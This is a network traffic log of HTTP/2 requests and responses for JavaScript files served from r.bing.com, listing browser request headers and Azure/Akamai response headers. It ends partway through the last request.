Remote address:92.123.128.139:443RequestGET /rs/7b/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Tue, 16 Aug 2022 23:21:32 GMT
x-eventid: 65df24323cd744c1a78f9db3d4af0917
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E0A3
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Wch+9aRz+8it9vJFwuoFJ4qnKe7xBEhOYkpBv7CCOD4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
cache-control: public, max-age=333865
expires: Mon, 04 Mar 2024 12:16:14 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d918
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: +jWBJey2nJqR+pG7G7E28A==
last-modified: Wed, 17 Aug 2022 06:26:50 GMT
etag: 0x8DA801978517195
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 289d645b-c01e-00e0-702b-4363c8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 197
cache-control: public, no-transform, max-age=88385
expires: Fri, 01 Mar 2024 16:04:54 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d919
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/54AhoVrJ5wIiJSQo1829bjCTaDo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 7LARNDLKwsABR19pg4tPCQ==
last-modified: Fri, 23 Feb 2024 08:16:01 GMT
etag: 0x8DC3447AC49992E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: de5165b1-101e-0087-6378-68d64f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 486
vary: Accept-Encoding
cache-control: public, no-transform, max-age=138124
expires: Sat, 02 Mar 2024 05:53:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: kdgVpI0X+oWcnOv0ZCUuIA==
last-modified: Wed, 17 Aug 2022 05:16:17 GMT
etag: 0x8DA800F9D12D39D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9e1325c7-501e-0039-5c4e-ea1b4d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=60446
expires: Fri, 01 Mar 2024 08:19:15 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/JigriHckblqcu1XwKpT4wumVS2k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB98ED24F28723
akamai-grn: 0.92777b5c.1708647034.8ff90a5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: isSXzX/W/NGLzoHAAcAxAw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 44f6fa1c-001e-001b-5a94-fbde52000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 507
vary: Accept-Encoding
cache-control: public, no-transform, max-age=181562
expires: Sat, 02 Mar 2024 17:57:51 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91c
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6W4GJTTFhKoLN+eXDWPo3Q==
last-modified: Wed, 17 Aug 2022 06:04:41 GMT
etag: 0x8DA801660363690
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d2ee816a-201e-00f8-6ef7-2cbcaf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 419
cache-control: public, no-transform, max-age=363791
expires: Mon, 04 Mar 2024 20:35:00 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/06bQtOdvnqIODKnOBKJedLV7FUg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: J1ppcZZ88x4wz9XLOsxf5w==
last-modified: Thu, 17 Dec 2020 19:58:23 GMT
etag: 0x8D8A2C61C8DBDD9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1b0efc70-301e-00db-2452-2f266c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, max-age=105633
expires: Fri, 01 Mar 2024 20:52:22 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: wMjND6gwy3LKsXBo8Ww74w==
last-modified: Wed, 17 Aug 2022 07:07:40 GMT
etag: 0x8DA801F2C4C11E6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fa1e7055-901e-006d-660f-58f161000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 481
cache-control: public, no-transform, max-age=191176
expires: Sat, 02 Mar 2024 20:38:05 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d91f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/HbkPYqcLh_xqZSd1KqLTrWN8MYY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YyZH8jmwn5IVz/gtinnkKA==
last-modified: Fri, 21 Apr 2023 04:27:15 GMT
etag: 0x8DB4220AFBE6A2C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8113048c-701e-0007-4e68-652949000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=190357
expires: Sat, 02 Mar 2024 20:24:26 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d920
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/hkXWsTcGTHs44QxzZyThd4fbbPM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cQ12N8x+IbYv0+/mq6H9Jw==
last-modified: Tue, 01 Nov 2022 22:37:14 GMT
etag: 0x8DABC599FC7792B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 41dffa2d-a01e-002d-2842-045322000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 66669
vary: Accept-Encoding
cache-control: public, no-transform, max-age=201769
expires: Sat, 02 Mar 2024 23:34:38 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d921
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/EcPZJcvBpS1TWE_YYG-PcTqlkRQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dqPx6aRSVk4Pjc5sDuER6A==
last-modified: Fri, 26 May 2023 14:44:56 GMT
etag: 0x8DB5DF7C626EC15
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ac730761-201e-0041-0189-2eb8b5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 19997
vary: Accept-Encoding
cache-control: public, no-transform, max-age=108610
expires: Fri, 01 Mar 2024 21:41:59 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d922
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/5FbVcVko_TuW5Y8VB4_bHoFuDm8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: vcPdJ7OhFHSgG1989IFOMA==
last-modified: Wed, 17 Aug 2022 05:13:34 GMT
etag: 0x8DA800F3C27CCA3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 90b9d3e0-201e-008a-4543-2abbe0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 859
vary: Accept-Encoding
akamai-grn: 0.47281102.1709195214.5b067272
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=17702
expires: Thu, 29 Feb 2024 20:26:51 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d923
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/VPMQzQB3PxOxIi0snQNYfwjTWzo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CTtz0f8py5iHMPvGUKISYA==
last-modified: Wed, 28 Feb 2024 14:11:34 GMT
etag: 0x8DC38672BC1C7D9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66da7e30-a01e-0076-3971-6acf62000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.748a4917.1709144773.9333451
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=355292
expires: Mon, 04 Mar 2024 18:13:21 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d928
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/EmbwE8rah_7zdUQkosWSw-5nAPY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Qpjkc0YIvUQ381yKh3l/kg==
last-modified: Fri, 10 Feb 2023 02:47:14 GMT
etag: 0x8DB0B111DF21D9C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a1008d1e-501e-00af-2a37-2c129c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 151
cache-control: public, no-transform, max-age=103003
expires: Fri, 01 Mar 2024 20:08:32 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d929
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/E9t3sAO3lNcvcdO-T16IoSdcs94.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: VSpqvYkgDkKc0LbYu9/vvw==
last-modified: Fri, 02 Feb 2024 08:29:51 GMT
etag: 0x8DC23C92004D3AB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cad765c2-c01e-0060-0200-5639b5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 4664
cache-control: public, no-transform, max-age=80630
expires: Fri, 01 Mar 2024 13:55:39 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d92a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/44Hadr7BiNLQdKT4SHan0JHPRgc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: AELdUtxBKKY90ux2JVDcDw==
last-modified: Tue, 12 Dec 2023 19:18:44 GMT
etag: 0x8DBFB472864EC3D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fcc1ad92-a01e-004f-59f8-419105000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 237
cache-control: public, no-transform, max-age=57968
expires: Fri, 01 Mar 2024 07:37:57 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d92b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/yOU5_vGeE7HIs09fec6ZV9prLO4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: q83g5aHD87qKY5PFltDJjw==
last-modified: Tue, 24 Jan 2023 22:05:44 GMT
etag: 0x8DAFE5723EAECBE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4a6918fc-501e-003f-6cfd-688d89000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=195524
expires: Sat, 02 Mar 2024 21:50:33 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d92c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/bv1BjsnUXnMc-Ei3W1LPthJOdzs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
